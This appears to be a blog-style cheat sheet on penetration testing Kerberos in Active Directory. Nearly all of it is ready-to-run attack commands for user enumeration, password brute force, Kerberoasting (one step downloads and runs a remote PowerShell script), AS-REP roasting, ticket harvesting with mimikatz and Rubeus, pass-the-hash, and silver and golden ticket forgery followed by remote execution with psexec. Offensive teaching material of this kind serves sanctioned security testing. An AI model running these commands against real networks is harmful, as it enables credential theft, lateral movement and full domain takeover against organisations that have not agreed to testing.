Today I will write about Kerberos Penetration Testing, which Active Directory uses to manage authentication inside the corporate environments. First a brief explanation about how Kerberos works and what we should know before try to hack Kerberos.
Table of Contents
How does Kerberos work?
Kerberos Components
- KDC – Kerberos Distribution Center
- Client – The client is requesting access to a service
- Service – service to allow when a ticket is requested
TGT – Ticket Granting Ticket
SPN – Service Principals’ Names are associated with service accounts and they can be used to request Kerberos service tickets (TGS).
In Kerberos, if the RC4_HMAC_MD5 encryption is in use, we have an NTLM hash.
Kerberos Authentication
| Tool | Description | Git |
|---|---|---|
| CrackMapExec | ||
| Rubeus | ||
| Metasploit | ||
| Empire | ||
| nmap | ||
| john | ||
| hashcat | ||
| kerbrute |
Enumeration
nmap --script krb5-enum-users --script-args krb5-enum-users.realm='rfs.local'-p 88 <target-ip>kerbrute userenum --dc 10.0.0.1 -d example.domain usernames.txtkerbture bruteuser --dc 10.0.0.1 -d example.domain passwords.txt usernameBrute Force Kerberos
kerbrute bruteforce --dc 10.0.0.1 -d example.domain combos.txtKerberos Attacks
Kerberoasting
python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>Crack the Hashes
hashcat -m 13100 --force <TGSs_file> <passwords_file>john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file>ASREPRoast
Check ASREPRoast for all domain users (credentials required).
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>Check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>Pass The Ticket (PTT)
Harvest Tickets in Linux
grep default_ccache_name /etc/krb5.confcp tickey /tmp/tickey
/tmp/tickey -iHarvest Tickets in Windows
mimikatz # sekurlsa::tickets /export.\Rubeus dumpConvert Tickets
python ticket_converter.py ticket.kirbi ticket.ccachepython ticket_converter.py ticket.ccache ticket.kirbiOverpass The Hash/Pass The Key (PTK)
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>python getTGT.py <domain_name>/<user_name>:[password]export KRB5CCNAME=<TGT_ccache_file>python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passSilver Tickets
python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>export KRB5CCNAME=<TGS_ccache_file>Execute remote command to use the TGT.
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passGolder Tickets
python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>export KRB5CCNAME=<TGS_ccache_file>python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passF.A.Q Kerberos Penetration Testing
What is an SPN?
Service Principals Names are associated with service accounts and they can be used to request Kerberos service tickets (TGS).